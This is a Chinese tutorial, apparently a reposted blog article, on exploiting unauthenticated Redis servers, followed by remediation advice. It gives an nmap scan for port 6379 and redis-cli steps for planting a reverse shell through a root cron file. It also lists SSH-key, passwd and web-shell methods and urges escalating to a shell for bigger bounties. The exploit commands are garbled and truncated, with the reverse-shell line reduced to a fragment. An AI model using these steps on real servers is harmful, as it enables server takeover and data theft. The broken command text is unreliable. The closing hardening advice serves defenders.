摸金Redis漏洞

摘要:漏洞可以参考乌云案例

1.Redis漏洞基本信息漏洞名称:Redis服务器远程执行漏洞漏洞详情:Redis因配置不当可以无密码登录,导致未授权访问。

当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件进行远程控制、反弹shell进行远程控制、或投放其他恶意文件,也可以直接执行redis命令,可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生,严重危害业务正常服务。

利用原理:主要是通过无密码登录redis,然后往redis缓存写入数据库,再通过redis缓存保存到redis服务器任意目录。

目前常用的利用方式:1)写入SSH的key,然后利用key远程登录;2)替换redis服务器passwd文件,相当于修改服务器密码;3)写入网页木马(前提需要找到网站路径),可通过网页木马远程控制服务器;4)写入反弹shell,然后利用shell远程控制服务器

漏洞等级:高危

2.如何发现存在漏洞的网站

124.116.xxx.xxx(测试服务器哈),公网刷redis漏洞其实也是借助第三方信息收集平台,比如XX眼,然后再通过XXXX找到真实的域名,或者扫描端口。内网的话,就直接nmap -p 6379 192.168.1.1/24 -open。

3.漏洞利用测试

不管内网还是外网,漏洞的利用是关键。现在我们来进行测试一下

返回PONG说明是没有设置密码,直接查看服务器信息 info

一般到这来就可以提交漏洞了,只是getshell厂商给的赏金高,这里直接参考乌云案例步骤

a.由于redis服务器默认是没有设redis访问密码,攻击者可直接向rides服务器缓存写入一个反弹shell:

0>&1\n\n"redis-cli -h 需要测试的网站ip -x set 1

b.登录redis服务器redis服务,进行备份/创建一个/var/spool/cron目录root文件

redis-cli -h 需要测试的网站ip

c.最后就是开启监听端口

4.修复建议

纵观整个攻击流程,之所以很顺利,都是因为redis-server的默认配置有着诸多不足,而运维同学为了简单,都直接使用了默认配置。

修复方法参考:

1、限制redis访问

如果仅需要在本地访问redis,找到redis.conf配置文件设置bind配置项为:bind 127.0.0.1

保存,重启redis服务再次查看redis进程。

或主机防火墙/网络防火墙设置仅允许某IP访问redis服务器redis服务端口(默认6379)。

2、设置redis访问密码

增加redis访问密码同上,在redis.conf配置文件中找到requirepass配置项,取消#注释符,在requirepass后面添加设置的密码

3、以非root用户运行redis服务

本文来自企鹅号 - 全球大搜罗媒体

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏雨过天晴

原 PHPStrom 9系列激活码

1954
来自专栏云计算教程系列

使用Apache或Nginx加密Tomcat流量

Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Serv...

1826
来自专栏python学习路

二、urllib进阶

Handler处理器 和 自定义Opener opener是 urllib.request.OpenerDirector 的实例,我们之前一直都在使用的ur...

3125
来自专栏weixuqin 的专栏

Django 使用第三方服务发送电子邮件

1414
来自专栏LeoXu的博客

JavaScript异步调用操作可增加finally回调

JavaScript异步调用操作(如远程服务、本地任务)的API一般只提供的执行成功(success)和执行失败(fail)的回调,其实还可以...

763
来自专栏技术栏

Nginx 每天莫名自动重启问题

最近在做基于openresty的waf,在测试openresty的过程中用openresty替代了原nginx,结果第二天又自动切换回了原nginx,通过ps ...

3808
来自专栏黑泽君的专栏

【MyEclipse】我们导入的jar包后, 一般没有关联源码, 需要手动进行关联!推荐这种方式。

1125
来自专栏Jerry的SAP技术分享

如何给VirtualBox虚拟机的ubuntu LVM分区扩容

我在VirtualBox安装的ubuntu里安装Cloud Foundry时遇到错误信息,磁盘空间不够了:

3774
来自专栏月牙寂

k8s源码分析-----kubectl(1)api.RESTMapper

第一时间获取文章,可以关注本人公众号 月牙寂道长 yueyajidaozhang

4356
来自专栏FreeBuf

TinyShop缓存文件获取WebShell之0day

TinyShop是一款电子商务系统(网店系统),适合企业及个人快速构建个性化网上商店。系统是基于Tiny(自主研发)框架开发的,使系统更加的安全、快捷、稳定、高...

2449

扫码关注云+社区

领取腾讯云代金券